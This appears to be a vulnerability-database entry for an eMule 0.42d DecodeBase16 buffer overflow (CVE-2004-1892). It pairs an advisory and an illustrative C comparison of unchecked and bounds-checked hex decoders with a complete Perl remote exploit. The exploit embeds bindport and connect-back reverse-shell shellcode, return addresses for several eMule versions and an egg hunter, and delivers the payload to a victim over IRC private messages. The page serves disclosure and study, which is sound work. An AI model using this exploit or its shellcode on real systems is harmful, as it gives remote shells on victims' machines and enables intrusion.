eMule Remote Buffer Overflow Vulnerability

Vulnerability ID: 1107873    Vulnerability type: Boundary condition error
Published: 2004-04-12    Updated: 2005-10-20
CVE ID: CVE-2004-1892
CNNVD ID: CNNVD-200412-890
Platform: Windows    CVSS score: 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/175
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-890
|Vulnerability details
eMule is a peer-to-peer file sharing client. eMule performs a memory copy without checking the bounds of the destination buffer; a remote attacker can exploit this to overflow the buffer and possibly execute arbitrary instructions on the system with the privileges of the eMule process. The problem is in the DecodeBase16(...) function of eMule v0.42d. The function takes a hexadecimal string, its length and a destination buffer as parameters and performs no check on the input string at all, so an overlong string writes past the end of the destination buffer; carefully crafted data may lead to arbitrary code execution with the privileges of the process. The exploit below reaches the function through eMule's built-in IRC client: the hex payload is delivered to the target's nickname inside a CTCP SENDLINK private message.
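The interface the advisory describes (hex string, length, destination pointer, and no destination size) is the whole bug. The following is an added illustration written for this page, not eMule's source: a hypothetical decoder with exactly that interface next to a hardened version that carries the destination capacity and refuses input that would not fit. The function names, the 4-byte demo buffer and the sample hex strings are all constructed for the example.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Map one ASCII hex digit to its value, or return -1 for any other byte. */
static int hex_nibble(char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Vulnerable pattern (hypothetical reconstruction of the interface the
 * advisory describes, not eMule's code): hex string, its length and a
 * destination pointer, but no destination size. The decoder writes len/2
 * bytes wherever dst points; a sender who controls len controls how far
 * past the real buffer the writes reach. */
void decode_base16_unchecked(const char *hex, size_t len, unsigned char *dst)
{
    for (size_t i = 0; i + 1 < len; i += 2) {
        unsigned hi = (unsigned)hex_nibble(hex[i]);
        unsigned lo = (unsigned)hex_nibble(hex[i + 1]);
        dst[i / 2] = (unsigned char)((hi << 4) | lo);   /* i / 2 is never bounded */
    }
}

/* Hardened form: the capacity travels with the pointer and is checked
 * before any write. Returns bytes written, or -1 when the input is
 * odd-length, contains a non-hex byte, or would not fit in dst_cap. */
long decode_base16_checked(const char *hex, size_t len,
                           unsigned char *dst, size_t dst_cap)
{
    if (len % 2 != 0 || len / 2 > dst_cap)
        return -1;
    for (size_t i = 0; i < len; i += 2) {
        int hi = hex_nibble(hex[i]);
        int lo = hex_nibble(hex[i + 1]);
        if (hi < 0 || lo < 0)
            return -1;
        dst[i / 2] = (unsigned char)((hi << 4) | lo);
    }
    return (long)(len / 2);
}

/* Constructed demo: a 4-byte logical buffer at area[0..3], with area[4..7]
 * standing in for whatever sits next to it in memory. Everything lives in
 * one array so the demo itself stays inside a single allocation. Returns
 * true when the unchecked decoder has overwritten the neighbouring bytes. */
bool unchecked_decoder_clobbers_neighbour(void)
{
    unsigned char area[8];
    memset(area, 0xAA, sizeof area);
    decode_base16_unchecked("0011223344556677", 16, area); /* 8 bytes into a "4-byte" buffer */
    return memcmp(area + 4, "\x44\x55\x66\x77", 4) == 0;
}

/* Same oversized input against the checked decoder with the true capacity. */
long checked_decoder_rejects_oversize(void)
{
    unsigned char buf[4];
    return decode_base16_checked("0011223344556677", 16, buf, sizeof buf);
}

/* Well-formed input still decodes: returns 1 if "deadBEEF" -> de ad be ef. */
int checked_decoder_accepts_valid(void)
{
    unsigned char buf[4];
    long n = decode_base16_checked("deadBEEF", 8, buf, sizeof buf);
    return n == 4 && memcmp(buf, "\xde\xad\xbe\xef", 4) == 0;
}

/* Malformed input is refused before any byte is written. */
int checked_decoder_rejects_malformed(void)
{
    unsigned char buf[4];
    return decode_base16_checked("abc", 3, buf, sizeof buf) == -1 &&   /* odd length */
           decode_base16_checked("zz", 2, buf, sizeof buf) == -1;      /* non-hex byte */
}

int main(void)
{
    printf("unchecked decoder clobbers neighbour: %s\n",
           unchecked_decoder_clobbers_neighbour() ? "yes" : "no");
    printf("checked decoder on oversize input: %ld\n", checked_decoder_rejects_oversize());
    printf("checked decoder accepts valid input: %d\n", checked_decoder_accepts_valid());
    printf("checked decoder rejects malformed input: %d\n", checked_decoder_rejects_malformed());
    return 0;
}
```

The fix is not "validate the hex characters" on its own; the unchecked decoder would overflow with perfectly valid hex. The property that matters is that the number of output bytes is compared against the destination capacity before the first write, which is why the hardened signature takes dst_cap.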
|Exploit (EXP)
#!/usr/bin/perl
#
# eMule <= 0.42d Remote Exploit by kcope
# 
# exploits the DecodeBase16 buffer overflow
# tested on WinXP SP1 / Win2k SP4
# bindport/connectback shellcode
#
# thanks Kostya Kortchinsky for his posting to bugtraq
# 
# greetings to sander, blackzero, beginna, adize, A-cru and wY :p
# have fun!
#
# kcope, kingcope gmx net Apr 2004
#

use Socket;
use Getopt::Std;

# bindport shellcode (port 2004) thanks to metasploit
$sc = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x21\x39".
"\x11\x09\x83\xeb\xfc\xe2\xf4\xc9\x6f\x11\x09\x21\x6a\x44\x5f\x76".
"\xb2\x7d\x2d\x39\xb2\x54\x35\xaa\x6d\x14\x71\x20\xd3\x9a\x43\x39".
"\xb2\x4b\x29\x20\xd2\xf2\x3b\x68\xb2\x25\x82\x20\xd7\x20\xf6\xdd".
"\x08\xd1\xa5\x19\xd9\x65\x0e\xe0\xf6\x1c\x08\xe6\xd2\xe3\x32\x5d".
"\x1d\x05\x7c\xc0\xb2\x4b\x2d\x20\xd2\x77\x82\x2d\x72\x9a\x53\x3d".
"\x38\xfa\x82\x25\xb2\x10\xe1\xca\x3b\x20\xc9\x7e\x67\x4c\x52\xe3".
"\x31\x11\x57\x4b\x09\x48\x6d\xaa\x20\x9a\x52\x2d\xb2\x4a\x15\xaa".
"\x22\x9a\x52\x29\x6a\x79\x87\x6f\x37\xfd\xf6\xf7\xb0\xd6\x88\xcd".
"\x39\x10\x09\x21\x6e\x47\x5a\xa8\xdc\xf9\x2e\x21\x39\x11\x99\x20".
"\x39\x11\xbf\x38\x21\xf6\xad\x38\x49\xf8\xec\x68\xbf\x58\xad\x3b".
"\x49\xd6\xad\x8c\x17\xf8\xd0\x28\xcc\xbc\xc2\xcc\xc5\x2a\x5e\x72".
"\x0b\x4e\x3a\x13\x39\x4a\x84\x6a\x19\x40\xf6\xf6\xb0\xce\x80\xe2".
"\xb4\x64\x1d\x4b\x3e\x48\x58\x72\xc6\x25\x86\xde\x6c\x15\x50\xa8".
"\x3d\x9f\xeb\xd3\x12\x36\x5d\xde\x0e\xee\x5c\x11\x08\xd1\x59\x71".
"\x69\x41\x49\x71\x79\x41\xf6\x74\x15\x98\xce\x10\xe2\x42\x5a\x49".
"\x3b\x11\x0e\xf5\xb0\xf1\x63\x31\x69\x46\xf6\x74\x1d\x42\x5e\xde".
"\x6c\x39\x5a\x75\x6e\xee\x5c\x01\xb0\xd6\x61\x62\x74\x55\x09\xa8".
"\xda\x96\xf3\x10\xf9\x9c\x75\x05\x95\x7b\x1c\x78\xca\xba\x8e\xdb".
"\xba\xfd\x5d\xe7\x7d\x35\x19\x65\x5f\xd6\x4d\x05\x05\x10\x08\xa8".
"\x45\x35\x41\xa8\x45\x35\x45\xa8\x45\x35\x59\xac\x7d\x35\x19\x75".
"\x69\x40\x58\x70\x78\x40\x40\x70\x68\x42\x58\xde\x4c\x11\x61\x53".
"\xc7\xa2\x1f\xde\x6c\x15\xf6\xf1\xb0\xf7\xf6\x54\x39\x79\xa4\xf8".
"\x3c\xdf\xf6\x74\x3d\x98\xca\x4b\xc6\xee\x3f\xde\xea\xee\x7c\x21".
"\x51\x6f\xd1\xc3\x4a\xee\x5c\x25\x08\xca\x5a\xde\xe9\x11\x09";

# connect back shellcode by lion, xor 0x21 
$cbsc = 
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x21\xE2\xFA".
"\xEB\x05\xE8\xEB\xFF\xFF\xFF".
"\xC8\xDA\x21\x21\x21\x7E\x45\x80\x11\x21\x21\x21\xAA\x61\x2D\xAA".
"\x51\x3D\x8C\xAA\x49\x29\xAA\xD6\x4B\x25\x78\xC9\xBA\x21\x21\x21".
"\xC3\xD8\x49\x12\x13\x21\x21\x49\x56\x52\x13\x7E\x75\xDE\x37\xAA".
"\xC9\x4B\x25\x78\xC9\xA3\x21\x21\x21\xC3\xD8\xA0\xCD\xB1\x20\x21".
"\x21\x75\x49\x20\x20\x21\x21\xDE\x77\x31\x71\x71\x71\x71\x61\x71".
"\x61\x71\xDE\x77\x35\xAA\xF9\x49\x5E\x21\x21\x20\x49\x23\x21\x21".
"\x14\xAA\xED\x4B\x31\x70\x72\xDE\x77\x39\xA4\xE1\x54\x6B\x49\x42".
"\x4C\x45\x21\xA8\x47\x11\xA2\xCD\x75\xAC\x1D\x05\x4B\x34\x78\x8A".
"\xC3\xDC\xE7\x65\x05\x31\x65\xDF\x65\x05\x1C\xA8\x7D\x05\x69\xA8".
"\x7D\x05\x6D\xA8\x7D\x05\x71\xAC\x65\x05\x31\x75\x71\x70\x70\x70".
"\x4B\x20\x70\x70\xDE\x57\x11\x70\xDE\x77\x25\xAA\xED\x4B\xDE\xDE".
"\x10\xDE\x77\x29\x72\xDE\x77\x3D\xDE\x77\x2D\x70\x77\xAA\x64\x1D".
"\xAA\x75\x09\x59\x22\xF4\x73\xAA\x53\x01\x22\xD4\x12\xE8\x68\x60".
"\x8C\x22\xE4\x12\xFA\x2E\x9F\x31\x1B\xF7\x55\x29\xE0\xEA\x2C\x22".
"\xFB\x61\xCA\xD0\x1A\x3E\x54\xC6\x7B\xAA\x7B\x05\x22\xFC\x47\xAA".
"\x2D\x6A\xAA\x7B\x3D\x22\xFC\xAA\x25\xAA\x22\xE4\x8A\x7F\x78\xE2".
"\xC9\x21\xDE\xDE\xDE\xAF\x6F\x2F\xCD\x53\xDF\x92\x37\x8C\xF8\x24".
"\xEF\x5F\xF9\xC3\x52\xEA\xCC\xDD\x1A\xF8\x28\xD4\x8C\xCD\xD8\x8B".
"\x41\xC6\x58\xE7\x58";

# find shellcode in memory
$find_sc = "648B3D08000000BA0100000042424264".
"8B1A8BCB2BCFB0D9909090FCF2AE803F".
"EE9075F8807F01D975F2BA0100000042".
"803C3A7475E64FFFE79090";

$find_sccb = "648B3D08000000BA0100000042424264".
"8B1A8BCB2BCFB0EB909090FCF2AE803F".
"109075F8807F015B75F2BA0100000042".
"803C3A4B75E64FFFE79090"; 

$numtargets = 4;

# [ target name, return address as the little-endian hex string that is sent, length of the first NOP sled ]
@targets = 
(
["eMule 0.42d", "7af65700", 76],
["eMule 0.42c", "514c5f00", 76],
["eMule 0.42b (Hotfix)", "d12e5f00", 76],
["eMule 0.42a", "012f5f00", 76]
# ["eMule 0.30e", "acf65b00", 20]
);

$exploiting_nick = "eMuleIRC3713"; # change this nickname if needed

sub connecttoserver()
{
$bool = "yes";
$iaddr = inet_aton($ircserver) || die("Failed to find host: $ircserver");
$paddr = sockaddr_in($ircport, $iaddr);
$proto = getprotobyname('tcp');
socket(SOCK1, PF_INET, SOCK_STREAM, $proto) || die("Failed to open socket:$!");
connect(SOCK1, $paddr) || ($bool = "no");   # the caller checks $bool instead of dying here
}

sub usage() {

print "usage: emule4x.pl -n <nick> -s <server> <-t type> [-p port] [-c <ip:port>]\r\n".
"use -c switch for reverse shell\r\n". 
"example: perl emule4x.pl -n emuleuser -s irc.somenet.com -t 0\r\n\r\ntarget types:\r\n";

for ($i=0; $i<$numtargets; $i++) {
print "\t[".$i."]...". $targets[$i][0]. "\r\n";
} 
exit;
}

$| = 1;
print "\r\n----------------------------------------------------------------------\r\n";
print "eMule <= 0.42d Remote Exploit by kcope . kingcope[at]gmx.net\r\n";
print "Tested on Win2k SP4/WinXP SP1\r\n";
print "----------------------------------------------------------------------\r\nLets have fun!\r\n\r\n";

if (@ARGV < 4) {
usage(); 
}

%options=();
getopt("scnpt", \%options);   # Getopt::Std wants a hash reference; every switch takes an argument

$nickname = $options{n};
$ircserver = $options{s};
$type = $options{t};

if (!defined $type) {
print "Please specify a target type.\r\n";
exit;
}

if (!defined $targets[$type][0]) {
print "Invalid target type.\r\n";
exit;
}

if (defined $options{p}) {
$ircport = $options{p};
} else {
$ircport = 6667;
}

$usecb=-1;
if (defined $options{c}) {
$usecb=1;
$idx = index $options{c},":";
$cbip = substr $options{c},0,$idx;
$cbport = substr $options{c},$idx+1; 
}

print "Target type set to ".$targets[$type][0].".\r\n";
$ret = $targets[$type][1];
$nops1 = "90" x $targets[$type][2];
$nops2 = "90" x 40; # customize if needed

if ($usecb eq 1) {
($a1, $a2, $a3, $a4) = split(//, gethostbyname("$cbip"));
$a1 = chr(ord($a1) ^ 0x21);
$a2 = chr(ord($a2) ^ 0x21);
$a3 = chr(ord($a3) ^ 0x21);
$a4 = chr(ord($a4) ^ 0x21);
substr($cbsc, 111, 4, $a1 . $a2 . $a3 . $a4);

($p1, $p2) = split(//, reverse(pack("s", $cbport)));
$p1 = chr(ord($p1) ^ 0x21);
$p2 = chr(ord($p2) ^ 0x21);
substr($cbsc, 118, 2, $p1 . $p2);

print "Using connect back method on $cbip port $cbport.\r\n";
}

print "Connecting to $ircserver on port $ircport...";

connecttoserver();

if ($bool eq "no")
{
print "Connection refused.\r\n";
exit(0);
}

send(SOCK1,"NICK $exploiting_nick\r\n",0);
send(SOCK1,"USER $exploiting_nick \"yahoo.com\" \"eu.dal.net\" :$exploiting_nick\r\n",0);

while (<SOCK1>) { 
$line = $_;
# print $line;
# numeric 376 (RPL_ENDOFMOTD) means registration with the server is complete
if ((index $line, " 376 ") ne -1) {
goto logged_in; 
}

# answer server PINGs: turn "PING" into "PONG" and echo the line back
if ((index $line, "PING") ne -1) {
substr($line,1,1,"O");
send(SOCK1, $line, 0); 
}
}

logged_in:

print " ok\r\n"; 
sleep(4); 
print "Sending buffers to $nickname...";

# 005f4c51 eMule 0.42c (514c5f00)
# 0057f67a eMule 0.42d (7AF65700)

# First PRIVMSG carries the raw shellcode so it ends up somewhere in eMule's memory.
# Second PRIVMSG is the CTCP SENDLINK whose hex body DecodeBase16 overflows with:
# NOP sled, "EB 07" (jmp short +7, skipping the return address), the target's return
# address, "90 66 81 EC 40 00" (nop; sub sp,0x40 to move the stack below the smashed
# frame), a second NOP sled, then the egg hunter that finds the shellcode from message one.
if ($usecb eq 1) {
send(SOCK1, "PRIVMSG $nickname :$cbsc\r\n", 0);
send(SOCK1, "PRIVMSG $nickname :\x01SENDLINK|" . $nops1 . "EB079090". $ret .
"906681EC4000". $nops2 . $find_sccb ."|\x01\r\n", 0);
} else {
send(SOCK1, "PRIVMSG $nickname :$sc\r\n", 0);
send(SOCK1, "PRIVMSG $nickname :\x01SENDLINK|" . $nops1 . "EB079090". $ret .
"906681EC4000". $nops2 . $find_sc ."|\x01\r\n", 0); 
}

if ($usecb ne 1) {
print "\r\nNow try connecting to ".$nickname."'s ip on port 2004.\r\n";
} else {
print "\r\nWatch at your netcat for some shell.\r\n"; 
}

$recv = <SOCK1>;
$recv = <SOCK1>;
$recv = <SOCK1>;
$recv = <SOCK1>;
$recv = <SOCK1>;
$recv = <SOCK1>;
$recv = <SOCK1>;
$recv = <SOCK1>;
$recv = <SOCK1>;
print " done\r\n";

# EOF 

# milw0rm.com [2004-04-12]
|References

Source: BID
Name: 10039
Link: http://www.securityfocus.com/bid/10039
Source: www.emule-project.net
Link: http://www.emule-project.net/home/perl/news.cgi?l=1&cat_id=22
Source: SECUNIA
Name: 11289
Link: http://secunia.com/advisories/11289
Source: XF
Name: emule-decodebase16-bo(15730)
Link: http://xforce.iss.net/xforce/xfdb/15730
Source: BUGTRAQ
Name: 20040403 eMule v0.42d Buffer Overflow
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=108100987429960&w=2
Source: NSFOCUS
Name: 6274
Link: http://www.nsfocus.net/vulndb/6274
